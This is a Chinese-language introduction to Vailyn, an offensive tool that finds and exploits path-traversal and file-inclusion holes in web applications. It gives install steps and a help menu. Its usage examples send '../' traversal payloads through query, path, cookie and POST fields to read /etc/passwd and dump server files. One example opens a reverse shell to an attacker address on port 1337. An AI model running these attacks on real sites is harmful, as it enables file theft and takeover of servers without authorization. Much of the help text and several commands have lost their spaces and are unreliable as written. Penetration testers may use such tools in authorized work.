
关于Vailyn
Vailyn它是一种多阶段的漏洞分析和利用工具,可以帮助大多数研究人员分析、识别和使用包含漏洞的路径和文件。该工具的性能非常强,并实现了大量的过滤和避免技术。
Vailyn操作分为两个阶段。首先,它可以尝试访问/etc/passwd或者用户指定的文件来检测漏洞是否存在。此时,我们可以自由选择使用什么Payload,我们选择的工具将在第二阶段使用Payload。
第二阶段是漏洞利用阶段。现在,该工具将尝试使用文件和目录字典从目标服务器中提取所有可能的文件。参数可以调整搜索深度和目录排列级别。或者,它可以下载找到的文件并将其保存在其中loot文件夹。除此之外,Vailyn也将尝试在目标系统中获得反向Shell,并允许攻击者完全控制目标服务器。
当前版本的Vailyn通过查询实现注入、路径、Cookie和POST数据等。
工具安装
我们建议的Vailyn运行环境为Python 3.7但理论上,这个工具应该适用于Python 3.5或Python 3.6环境。
如需安装Vailyn,项目可直接访问【Releases下载工具文档或使用下列命令将项目源码克隆到本地:
$gitclonehttps://github.com/VainlyStrain/Vailyn下载项目源代码后,我们需要安装工具所需的工具Python依赖组件。
(1) Unix系统
在Unix下列命令可直接运行在系统上:
$pipinstall-rrequirements.txt#--user(2) Windows系统
在Windows可直接用于系统pip命令来安装“Vailyn\·›\requirements-windows.txt”中列出的依赖组件。
(3) 最后一步
若要使用反向Shell我们还需要安装模块的完整功能sshpass、ncat和konsole。
接下来,我们可以直接使用以下命令Vailyn了:
$pythonVailyn-h工具使用
Vailyn提供三个必要参数:-v VIC,-a INT和-p2 TP P1 P2。如果使用了-a对于参数,可以支持更多的选项。
,\/,':.\./\../.:'':;.:\.,:/''./;..::'',':.,.__.''''`:.__:''.:'';..,;'**'.,.:'`v;.;v'o.''..:.''.o'.:*|Vailyn|[VainlyStrain]VsyntaVailyn-vVIC-aINT-p2TPP1P2[-pPAM][-iF][-PiVIC2][-cC][-n][-dIJK][-sT][-t][-L][-l][-P][-A]mandatory:-vVIC,--victimVICTargettoattack,part1[pre-payload]-aINT,--attackINTAttacktype(int,1-5,orA)A|Spider(all)2|Path5|POSTData,jsonP|Spider(partial)3|Cookie1|QueryParameter4|POSTData,plain-p2TPP1P2,--phase2TPP1P2AttackinPhase2,andneededparameters┌[Values]─────────────┬────────────────────┐│TP│P1│P2│├─────────┼─────────────┼────────────────────┤│leak│FileDict│DirectoryDict││inject│IPAddr│ListeningPort││implant│SourceFile│ServerDestination│└─────────┴─────────────┴────────────────────┘additional:-pPAM,--paramPAMqueryparameterorPOSTdatafor--attack1,4,5-iF,--checkFFiletocheckforinPhase1(df:etc/passwd)-PiVIC2,--vic2VIC2AttackTarget,part2[post-payload]-cC,--cookieCCookietoappend(inheaderformat)-l,--lootDownloadfoundfilesintothelootfolder-dIJK,--depthsIJKdepths(I:phase1,J:phase2,K:permutationlevel)-h,--helpshowthishelpmenuandexit-sT,--timeoutTRequestTimeout;stableswitchforArjun-t,--torPipeattacksthroughtheToranonymitynetwork-L,--lfiAdditionallyusePHPwrapperstoleakfiles-n,--nosploitskipPhase2(doesnotneed-p2TPP1P2)-P,--preciseUseexactdepthinPhase1(notarange)-A,--appStartVailyn'sQt5interfacedevelop:--debugDisplayeverypathtried,even404s.--versionPrintprogramversionandexit.--notmainAvoidnotify2crashinsubprocesscall.Info:toleakfilesusingabsolutepaths:-d000togetashellusingabsolutepaths:-d0X0Vailyn目前支持五种攻击向量,并提供自动爬虫。我们可以通过-a INT选择需要执行的攻击参数:
INTattack-----------1query-basedattack(https://site.com?file=../../../)2path-basedattack(https://site.com/../../../)3cookie-basedattack(willgrabthecookiesforyou)4plainpostdata(ELEM1=VAL1&ELEM2=../../../)5jsonpostdata({"file":"../../../"})Aspiderfetch analyzeallURLsfromsiteusingallvectorsPpartialspiderfetch analyzeallURLsfromsiteusingonlyselectedvectors演示工具
简单查询攻击,第二阶段提取文件:
$Vailyn-v"http://site.com/download.php"-a1-p2leakdicts/filesdicts/dirs-pfile-->http://site.com/download.php?file=../INJECT查询简单,但知道file.php已存在:
$Vailyn-v"http://site.com/download.php"-a1-p2leakdicts/filesdicts/dirs-pfile-ifile.php-d2XX-P路径攻击简单:
$Vailyn-v"http://site.com/"-a2-p2leakdicts/filesdicts/dirs-->http://site.com/../INJECT但需要查询路径攻击的参数和标签:
$Vailyn-v"http://site.com/"-a2-p2leakdicts/filesdicts/dirs-Pi"?token=X#title"-->http://site.com/../INJECT?token=X#title简单的Cookie攻击:
$Vailyn-v"http://site.com/cookiemonster.php"-a3-p2leakdicts/filesdicts/dirsPOST Plain攻击:
$Vailyn-v"http://site.com/download.php"-a4-p2leakdicts/filesdicts/dirs-p"DATA1=xx&DATA2=INJECT"POST JSON攻击:
$Vailyn-v"http://site.com/download.php"-a5-p2leakdicts/filesdicts/dirs-p'{"file":"INJECT"}'但目标是登录界面:
$Vailyn-v"http://site.com/"-a1-p2leakdicts/filesdicts/dirs-c"sessionid=foobar"攻击,但需要反向攻击Shell(端口1337):
$Vailyn-v"http://site.com/download.php"-a1-p2injectMY.IP.IS.XX1337#ahighPhase2Depthisneededforloginjection完整的爬虫自动化模式:
$Vailyn-v"http://root-url.site"-aA工具演示视频
视频地址:点我看
项目地址
Vailyn:【GitHub传送门】